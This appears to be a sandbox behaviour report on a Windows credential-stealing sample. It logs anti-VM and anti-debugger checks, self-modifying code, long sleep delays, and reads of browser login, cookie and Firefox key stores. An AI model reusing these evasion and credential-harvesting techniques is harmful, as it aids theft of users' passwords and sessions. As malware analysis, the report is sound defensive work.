Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C0AB3 second address: 73C0AB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C0AB8 second address: 73C0B31 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8F21AFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F9CD8F21B06h 0x0000000f push eax 0x00000010 jmp 00007F9CD8F21AFBh 0x00000015 xchg eax, ebp 0x00000016 jmp 00007F9CD8F21B06h 0x0000001b mov ebp, esp 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F9CD8F21B08h 0x00000026 adc si, 3828h 0x0000002b jmp 00007F9CD8F21AFBh 0x00000030 popfd 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C0B31 second address: 73C0B49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9CD8E65994h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C0B49 second address: 73C0B4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73B0045 second address: 73B0097 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F9CD8E6598Dh 0x0000000b sbb ax, 4746h 0x00000010 jmp 00007F9CD8E65991h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov ebp, esp 0x0000001b jmp 00007F9CD8E6598Eh 0x00000020 and esp, FFFFFFF0h 0x00000023 pushad 0x00000024 mov dx, si 0x00000027 mov si, 9839h 0x0000002b popad 0x0000002c sub esp, 44h 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73B0097 second address: 73B009B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73B009B second address: 73B00A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73B00A1 second address: 73B011A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8F21B08h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F9CD8F21B00h 0x0000000f push eax 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F9CD8F21B01h 0x00000017 sbb ax, B216h 0x0000001c jmp 00007F9CD8F21B01h 0x00000021 popfd 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007F9CD8F21AFEh 0x00000029 sbb ah, 00000038h 0x0000002c jmp 00007F9CD8F21AFBh 0x00000031 popfd 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73B011A second address: 73B0127 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 xchg eax, ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73B0127 second address: 73B012B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73B012B second address: 73B0131 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73B0131 second address: 73B0144 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9CD8F21AFFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73B0144 second address: 73B0187 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F9CD8E65990h 0x00000010 add cl, FFFFFFF8h 0x00000013 jmp 00007F9CD8E6598Bh 0x00000018 popfd 0x00000019 push eax 0x0000001a push edx 0x0000001b call 00007F9CD8E65996h 0x00000020 pop esi 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73B0187 second address: 73B0203 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], esi 0x0000000a jmp 00007F9CD8F21B07h 0x0000000f xchg eax, edi 0x00000010 jmp 00007F9CD8F21B06h 0x00000015 push eax 0x00000016 pushad 0x00000017 mov di, 1994h 0x0000001b pushfd 0x0000001c jmp 00007F9CD8F21AFDh 0x00000021 add esi, 7FCE0A56h 0x00000027 jmp 00007F9CD8F21B01h 0x0000002c popfd 0x0000002d popad 0x0000002e xchg eax, edi 0x0000002f jmp 00007F9CD8F21AFEh 0x00000034 mov edi, dword ptr [ebp+08h] 0x00000037 pushad 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73B0203 second address: 73B027D instructions: 0x00000000 rdtsc 0x00000002 mov dx, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 movzx eax, bx 0x0000000a popad 0x0000000b mov dword ptr [esp+24h], 00000000h 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F9CD8E65997h 0x0000001a adc si, 98EEh 0x0000001f jmp 00007F9CD8E65999h 0x00000024 popfd 0x00000025 jmp 00007F9CD8E65990h 0x0000002a popad 0x0000002b lock bts dword ptr [edi], 00000000h 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007F9CD8E65997h 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73B027D second address: 73B0295 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9CD8F21B04h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73B0295 second address: 73B02AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007F9D48987B1Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F9CD8E6598Ah 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73B02AF second address: 73B0308 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8F21AFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a pushad 0x0000000b mov si, A93Bh 0x0000000f mov di, cx 0x00000012 popad 0x00000013 pop esi 0x00000014 jmp 00007F9CD8F21AFAh 0x00000019 pop ebx 0x0000001a pushad 0x0000001b mov dx, si 0x0000001e pushad 0x0000001f mov ah, 83h 0x00000021 jmp 00007F9CD8F21B05h 0x00000026 popad 0x00000027 popad 0x00000028 mov esp, ebp 0x0000002a jmp 00007F9CD8F21AFEh 0x0000002f pop ebp 0x00000030 pushad 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C09F7 second address: 73C09FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C09FD second address: 73C0A25 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8F21AFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F9CD8F21B04h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C0A25 second address: 73C0A92 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8E6598Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F9CD8E65996h 0x0000000f mov ebp, esp 0x00000011 jmp 00007F9CD8E65990h 0x00000016 pop ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a jmp 00007F9CD8E6598Dh 0x0000001f pushfd 0x00000020 jmp 00007F9CD8E65990h 0x00000025 sub ecx, 74004EA8h 0x0000002b jmp 00007F9CD8E6598Bh 0x00000030 popfd 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C0A92 second address: 73C0A98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C0A98 second address: 73C0A9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C0ECA second address: 73C0ED0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C0ED0 second address: 73C0F2D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8E6598Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov cx, 0E5Dh 0x00000010 pushad 0x00000011 mov cx, AFFFh 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 popad 0x00000019 push dword ptr [ebp+04h] 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f mov ebx, 34152CD0h 0x00000024 pushfd 0x00000025 jmp 00007F9CD8E65999h 0x0000002a add cl, 00000056h 0x0000002d jmp 00007F9CD8E65991h 0x00000032 popfd 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7410DD1 second address: 7410DD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7410DD5 second address: 7410E20 instructions: 0x00000000 rdtsc 0x00000002 call 00007F9CD8E65990h 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push edx 0x00000010 pop ecx 0x00000011 pushfd 0x00000012 jmp 00007F9CD8E65995h 0x00000017 adc esi, 433B5106h 0x0000001d jmp 00007F9CD8E65991h 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7410E20 second address: 7410E7F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F9CD8F21B07h 0x00000009 adc ecx, 21EBC03Eh 0x0000000f jmp 00007F9CD8F21B09h 0x00000014 popfd 0x00000015 jmp 00007F9CD8F21B00h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F9CD8F21AFEh 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7410E7F second address: 7410F03 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8E6598Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F9CD8E65996h 0x0000000f mov ebp, esp 0x00000011 jmp 00007F9CD8E65990h 0x00000016 mov dl, byte ptr [ebp+14h] 0x00000019 pushad 0x0000001a mov cl, 07h 0x0000001c pushfd 0x0000001d jmp 00007F9CD8E65993h 0x00000022 or si, B5BEh 0x00000027 jmp 00007F9CD8E65999h 0x0000002c popfd 0x0000002d popad 0x0000002e mov eax, dword ptr [ebp+10h] 0x00000031 pushad 0x00000032 mov cx, ACA3h 0x00000036 mov edx, eax 0x00000038 popad 0x00000039 and dl, 00000007h 0x0000003c pushad 0x0000003d pushad 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7410F03 second address: 7410F2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F9CD8F21AFCh 0x0000000a jmp 00007F9CD8F21B05h 0x0000000f popfd 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7410F2F second address: 7410F33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7410F33 second address: 7410F62 instructions: 0x00000000 rdtsc 0x00000002 call 00007F9CD8F21AFCh 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b test eax, eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 call 00007F9CD8F21AFAh 0x00000015 pop eax 0x00000016 call 00007F9CD8F21AFBh 0x0000001b pop esi 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7410F62 second address: 7410F7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9CD8E65995h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7410F7B second address: 7410FA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F9D48A06D65h 0x0000000e pushad 0x0000000f movsx edx, cx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F9CD8F21B02h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7410FA1 second address: 7410DD1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 sub ecx, ecx 0x00000009 jmp 00007F9CD8E6598Dh 0x0000000e inc ecx 0x0000000f jmp 00007F9CD8E6598Eh 0x00000014 shr eax, 1 0x00000016 pushad 0x00000017 mov ebx, ecx 0x00000019 mov cx, B729h 0x0000001d popad 0x0000001e jmp 00007F9D4894AB87h 0x00000023 jne 00007F9CD8E6597Dh 0x00000025 inc ecx 0x00000026 shr eax, 1 0x00000028 jne 00007F9CD8E6597Dh 0x0000002a imul ecx, ecx, 03h 0x0000002d movzx eax, dl 0x00000030 cdq 0x00000031 sub ecx, 03h 0x00000034 call 00007F9CD8E75E7Dh 0x00000039 cmp cl, 00000040h 0x0000003c jnc 00007F9CD8E65997h 0x0000003e cmp cl, 00000020h 0x00000041 jnc 00007F9CD8E65988h 0x00000043 shld edx, eax, cl 0x00000046 shl eax, cl 0x00000048 ret 0x00000049 or edx, dword ptr [ebp+0Ch] 0x0000004c or eax, dword ptr [ebp+08h] 0x0000004f or edx, 80000000h 0x00000055 pop ebp 0x00000056 retn 0010h 0x00000059 push ebp 0x0000005a push 00000001h 0x0000005c push edx 0x0000005d push eax 0x0000005e call edi 0x00000060 mov edi, edi 0x00000062 pushad 0x00000063 push eax 0x00000064 push edx 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7400ADC second address: 7400AEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9CD8F21AFCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7400AEC second address: 7400AFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c mov edi, ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 1454B10 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 1454BD0 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 15F1A06 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 14524EA instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 167B779 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 1442
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 1467
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 1441
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 1377
Source: C:\Users\user\AppData\Local\Temp\service123.exe API coverage: 1.1 %
Source: C:\Users\user\Desktop\file.exe TID: 2828 Thread sleep count: 48 > 30
Source: C:\Users\user\Desktop\file.exe TID: 2828 Thread sleep time: -96048s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 3332 Thread sleep count: 60 > 30
Source: C:\Users\user\Desktop\file.exe TID: 3332 Thread sleep time: -120060s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 5924 Thread sleep time: -32000s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 2056 Thread sleep count: 1442 > 30
Source: C:\Users\user\Desktop\file.exe TID: 2056 Thread sleep time: -2885442s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 344 Thread sleep count: 1467 > 30
Source: C:\Users\user\Desktop\file.exe TID: 344 Thread sleep time: -2935467s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 5308 Thread sleep count: 1441 > 30
Source: C:\Users\user\Desktop\file.exe TID: 5308 Thread sleep time: -2883441s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 4432 Thread sleep count: 1377 > 30
Source: C:\Users\user\Desktop\file.exe TID: 4432 Thread sleep time: -2755377s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 7816 Thread sleep count: 286 > 30
Source: C:\Users\user\AppData\Local\Temp\service123.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\entries\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\doomed\
Source: Amcache.hve.13.dr Binary or memory string: VMware
Source: Amcache.hve.13.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.13.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.13.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.13.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.13.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.13.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.13.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.13.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.13.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.13.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.13.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: chrome.exe, 00000004.00000002.2034671352.00000196D2038000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.13.dr Binary or memory string: vmci.sys
Source: Amcache.hve.13.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.13.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.13.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.13.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.13.dr Binary or memory string: VMware20,1
Source: Amcache.hve.13.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.13.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.13.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.13.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.13.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.13.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.13.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.13.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.13.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.13.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.13.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe File opened: NTICE
Source: C:\Users\user\Desktop\file.exe File opened: SICE
Source: C:\Users\user\Desktop\file.exe File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_00608230 LoadLibraryA,GetProcAddress,FreeLibrary,SleepEx,GetLastError, 8_2_00608230
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_0060116C Sleep,Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,GetStartupInfoA,_cexit,_initterm,exit, 8_2_0060116C
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_00601160 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv, 8_2_00601160
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_006011A3 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv, 8_2_006011A3
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_006013C9 SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm, 8_2_006013C9
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1584D0 cpuid 8_2_6C1584D0
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: Amcache.hve.13.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.13.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.13.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.13.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Source: Yara match File source: 8.2.service123.exe.6c0d0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: service123.exe PID: 7812, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

Remote Access Functionality

Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Source: Yara match File source: dump.pcap, type: PCAP